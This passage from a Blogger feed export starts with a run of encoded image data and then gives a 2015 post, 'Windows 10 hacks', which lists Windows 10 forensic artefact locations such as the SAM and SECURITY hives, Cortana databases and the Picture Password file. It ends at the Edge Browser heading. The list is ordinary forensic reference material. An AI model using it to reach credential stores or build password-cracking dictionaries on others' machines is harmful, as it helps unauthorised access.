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" /></div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com20tag:blogger.com,1999:blog-4509349481580895365.post-27701393461390799562015-09-24T17:27:00.000+05:302015-09-24T17:27:52.999+05:30Windows 10 hacks<div dir="ltr" style="text-align: left;" trbidi="on">
The following were stuff which would help you to do some hacks in windows 10<br />
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: left;">
All the credits of this post should go to Brent Muir and security affairs editor, since it was them
that shared a presentation with all the topics. In the bottom of the
post you can get the link to his presentation.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<h3 style="text-align: left;">
File Systems / Partitions</h3>
<b>Supported File Systems:</b><br /><br />
NTFS, Fat32, ExFat<br />
<br />Default Partition structure:<br />
<br />- “Windows” – core OS (NTFS)<br />- “Recovery” (NTFS)<br />- “Reserved”<br />- “System” – UEFI (Fat32)<br />- “Recovery Image” (NTFS)<br />
<br />
<h3 style="text-align: left;">
Registry Hives</h3>
<div style="text-align: left;">
- Registry hives format has not changed</div>
<div style="text-align: left;">
<br /> Can be examined with numerous tools <br /> (e.g. RegistryBrowser, RegistryViewer, X-Ways Forensics, etc.)<br /><br />- Location of important registry hives:</div>
<div style="text-align: left;">
<br />\Users\user_name\NTUSER.DAT<br />\Windows\System32\config\DEFAULT<br />\Windows\System32\config\SAM<br />\Windows\System32\config\SECURITY<br />\Windows\System32\config\SOFTWARE<br />\Windows\System32\config\SYSTEM</div>
<br />
<h3 style="text-align: left;">
Event Logs </h3>
- EVTX log format has not changed<br />
<br /> Can be examined with numerous tools <br /> (e.g. X-Ways Forensics, etc.)<br /><br />- Location of EVTX logs:<br />
<br />\Windows\System32\winevt\Logs\<br />
<br />
<br />
<h3 style="text-align: left;">
Event Logs – Windows Store </h3>
<div style="text-align: left;">
<br />\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-RbLSed3kj94/VbtAaviimeI/AAAAAAAAA1A/oJbhIUlEXUI/s1600/windows10.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="http://4.bp.blogspot.com/-RbLSed3kj94/VbtAaviimeI/AAAAAAAAA1A/oJbhIUlEXUI/s400/windows10.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-nuAgEfohNYY/VbtQZjteOtI/AAAAAAAAA1Q/FB9b6S1rAaQ/s1600/windows10-2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://4.bp.blogspot.com/-nuAgEfohNYY/VbtQZjteOtI/AAAAAAAAA1Q/FB9b6S1rAaQ/s400/windows10-2.jpg" width="400" /> </a></div>
<h3 class="separator" style="clear: both; text-align: justify;">
Prefetch</h3>
<div class="separator" style="clear: both; text-align: justify;">
\Windows\Prefetch\<br /> </div>
<h3 style="text-align: left;">
Shellbags</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- NTUSER.dat</div>
<div class="separator" style="clear: both; text-align: justify;">
<br />\SOFTWARE\Microsoft\Windows\Shell\Bags\<br /><br />- UsrClass.dat </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
LNK Shortcuts</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- LNK format has not changed</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /> Can be examined with numerous tools <br /> (e.g. X-Ways Forensics, etc.)<br /><br />- Useful fields:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /> Hostname<br /> MAC Address<br /> Volume ID<br /> Owner SID<br /> MAC Times</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Thumbcache</h3>
<div class="separator" style="clear: both; text-align: justify;">
Location of Thumbcache files:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br />\Users\user_name\AppData\Local\Microsoft\Windows\Explorer\</div>
<h3 style="text-align: left;">
Recycle Bin</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Recycle Bin artefacts have not changed<br />$I<br />Still provides original file name and path<br /><br />$R<br />Original file</div>
<h3 style="text-align: left;">
Volume Shadow Copies</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- vssadmin tool still provides list of current VSCs </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /><a href="http://1.bp.blogspot.com/-DvvhTYGP4Ro/VbtSXrts2tI/AAAAAAAAA1c/Eta9KjD6XHc/s1600/windows10-3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://1.bp.blogspot.com/-DvvhTYGP4Ro/VbtSXrts2tI/AAAAAAAAA1c/Eta9KjD6XHc/s400/windows10-3.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Windows Indexing Service</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Windows indexing service is an evidentiary gold mine<br /><br />Potentially storing emails and other binary items<br />Great as dictionary list for password cracking<br /><br />- Stored in an .EDB file<br /><br />Can be interpreted by EseDbViewer, ESEDatabaseView or X-Ways Forensics<br />If “dirty” dismount, need to use esentutl.exe<br /><br />- In Windows 10 stored in the following directory:<br />C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Cortana</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Windows 10 features “Cortana”, a personal assistant, which expands upon the unified search platform introduced in Windows 8,<br /><br />Search encompasses local files, Windows Store & online content<br />Can set reminders<br />Can initiate contact (e.g. write emails)<br /><br />- Cortana Databases (EDBs):<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\AppData\Indexed DB\IndexedDB.edb <br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\LocalState\ESEDatabase_CortanaCoreInstance\CortanaCireDb.dat<br /> <br />Interesting Tables:<br /><br />LocationTriggers<br />Latitude/Longitude and Name of place results<br />Geofences<br />Latitude/Longitude for where location based reminders are triggered <br />Reminders<br />Creation and completion time (UNIX numeric value)</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
- The following databases contain a list of contacts synched from email accounts:<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\LocalState\Contacts_xxxxx.cfg<br /><br />\Users\user_name\AppData\Local\Packages\Microsoft.Windows.Cortana_xxxx\LocalState\Contacts_xxxxx.cfg.txt</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Notification Centre</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- The following databases contain a list of notifications:<br /><br />\Users\user_name\AppData\Local\Microsoft\Windows\Notifications\appdb.dat<br /><br />Toast notifications are stored in embedded XML<br /><br /><a href="http://2.bp.blogspot.com/-v3NC6jgOtaM/VbtUPRcXJlI/AAAAAAAAA1o/PT8TvMStFAw/s1600/windows10-4.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://2.bp.blogspot.com/-v3NC6jgOtaM/VbtUPRcXJlI/AAAAAAAAA1o/PT8TvMStFAw/s400/windows10-4.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Picture Password</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- “Picture Password” is an alternate login method where gestures on top of a picture are used as a password<br /><br />- This registry key details the path to the location of the “Picture Password” file:<br /><br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\PicturePassword\user_GUID<br /><br />- Path of locally stored Picture Password file:<br /><br />C:\ProgramData\Microsoft\Windows\SystemData\user_GUID\ReadOnly\PicturePassword\background.png<br /> </div>
<h3 style="text-align: left;">
Applications</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Applications (Apps) that utilise the Metro Modern UI are treated differently to programs that work in desktop mode<br /><br />- Apps are installed in the following directory:<br /><br />\Program Files\WindowsApps\<br /><br />- Settings and configuration DBs are located in following directories:<br /><br />\Users\user_name\AppData\Local\Packages\package_name\LocalState\ <br /><br />Two DB formats:<br />SQLite DBs (.SQL)<br />Jet DBs (.EDB) </div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<h3 style="text-align: left;">
Windows Store</h3>
<div class="separator" style="clear: both; text-align: justify;">
<br />- Apps are purchased/installed via the Windows Store<br /><br />- During the Insider Preview their was a Beta Store which contained Windows 10 –compatible Apps (e.g. Microsoft Office Apps)<br /><br />- Registry key of installed applications:<br /><br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\<br /><br />- List of deleted applications:<br />HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\</div>
<h3 style="text-align: left;">
Edge Browser</h3>
<div class="separator" style="clear: both; text-align: justify;">
